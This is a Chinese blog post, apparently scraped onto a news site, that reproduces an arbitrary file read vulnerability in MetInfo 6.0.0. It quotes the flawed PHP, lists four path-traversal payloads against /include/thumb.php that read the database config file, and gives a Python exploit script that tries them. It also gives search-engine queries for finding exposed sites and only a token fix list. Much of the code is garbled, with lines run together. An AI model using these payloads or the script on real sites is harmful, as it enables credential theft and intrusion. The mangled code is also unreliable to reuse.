当前位置: 首页 > news >正文

Metinfo6.0.0任意文件读取【漏洞复现】

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 代码审计
        • 漏洞点
      • 1.5、深度利用
        • EXP编写
      • 1.6、漏洞挖掘
      • 1.7修复建议

1.1、漏洞描述

漏洞名称:MetInfo任意文件读取

漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的/app/system/include/module/old_thumb.class.php文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。

下载地址:历史版本安装文件下载 Ver_6.0.0

1.2、漏洞等级

高危

1.3、影响版本

在这里插入图片描述

影响版本:MetInfo 6.0.0

1.4、漏洞复现

代码审计

defined('IN_MET') or exit('No permission');load::sys_class('web');class old_thumb extends web{public function doshow(){global $_M;$dir = str_replace(array('../','./'), '', $_GET['dir']);if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){header("Content-type: image/jpeg");ob_start();readfile($dir);ob_flush();flush();die;}

$dir = str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]);

dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将.././替换成空值

readfile($dir);

漏洞点

/include/thumb.php

使用bp进行抓包

在这里插入图片描述

测试一:

/include/thumb.php?dir=..././http/..././config/config_db.php

测试二:

/include/thumb.php?dir=.....///http/.....///config/config_db.php

测试三:

/include/thumb.php?dir=http/.....///.....///config/config_db.php

测试四:

/include/thumb.php?dir=http\..\..\config\config_db.php# 此POC 仅适用于Windows 系统,Linux 下无效  
#    只有windows以右斜杠作为文件路径分隔符

在这里插入图片描述

1.5、深度利用

EXP编写

import requests
import sysbanner = """
MetInfo 6.0.0___________.__.__           __________                   .___\_   _____/|__|  |   ____   \______   \ ____ _____     __| _/|    __)  |  |  | _/ __ \   |       _// __ \\__  \   / __ | |     \   |  |  |_\  ___/   |    |   \  ___/ / __ \_/ /_/ | \___  /   |__|____/\___  >  |____|_  /\___  >____  /\____ | \/                 \/          \/     \/     \/      \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/
"""headers = {"User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}dir_list = ["..././http/..././config/config_db.php",".....///http/.....///config/config_db.php","http/.....///.....///config/config_db.php","http\..\..\config\config_db.php"
]def attack(host):vul = "/include/thumb.php"url = host + vulres = requests.get(url = url, headers = headers)if res.status_code != 200:print(f"[INFO] {vul} is Not Exists!")exit()print(f"[INFO] {vul} is Exists!")for param in dir_list:params = {"dir":  param }res = requests.get(url = url, params = params, headers = headers)print(f"[INFO] Test URL: {res.url}")if "<?php" in res.text:print("[RESULT] The target is vulnreable!")print(f"[RESULT]\n{res.text}")breakif len(sys.argv) < 2:print(banner)exit()host = sys.argv[1]attack(host = host)

在这里插入图片描述

1.6、漏洞挖掘

FOFA

app="metinfo"

ZoomEye

app:"MetInfo"
app:"MetInfo"+os:"Windows"

1.7修复建议

  • 升级
  • 打补丁
  • 上设备
http://www.lryc.cn/news/150827.html

相关文章:

  • Postgresql JSON对象和数组查询
  • 搭配购买——并查集+01背包
  • JVM调优指令参数
  • 数据结构入门 — 队列
  • MongoDB - 安装
  • Qt应用开发(基础篇)——颜色选择器 QColorDialog
  • vscode 清除全部的console.log
  • UG\NX CAM二次开发 插入工序 UF_OPER_create
  • C++指针、指针函数、函数指针、类指针
  • 图:最短路径问题(BFS算法,Dijkstra算法,Floyd算法)
  • 栈和队列篇
  • 分享一个vue-slot插槽使用场景
  • Qt应用开发(基础篇)——进度对话框 QProgressDialog
  • 基于SpringBoot2的后台业务管理系统
  • Jmeter(三十):并发测试(设置集合点)
  • Flink的checkpoint是怎么实现的?
  • ubuntu上安装nginx
  • 9. 微积分 - 导数
  • 滑动窗口系列1-达标子数组
  • 电视显示技术及价格成本对比(2023年)
  • 浅谈 Pytest+HttpRunner 如何展开接口测试!
  • vue自定义事件 div 拖拽方法缩小
  • 使用实体解析和图形神经网络进行欺诈检测
  • vue中axios请求篇
  • Springboot2.0 上传图片 jar包导出启动(第二章)
  • 添加YDNS免费的ipv6动态域名解析
  • 爬虫异常处理之如何处理连接丢失和数据存储异常
  • KVM虚拟化ubuntu
  • 模拟电子技术基础学习笔记三 PN结
  • java基础-----第七篇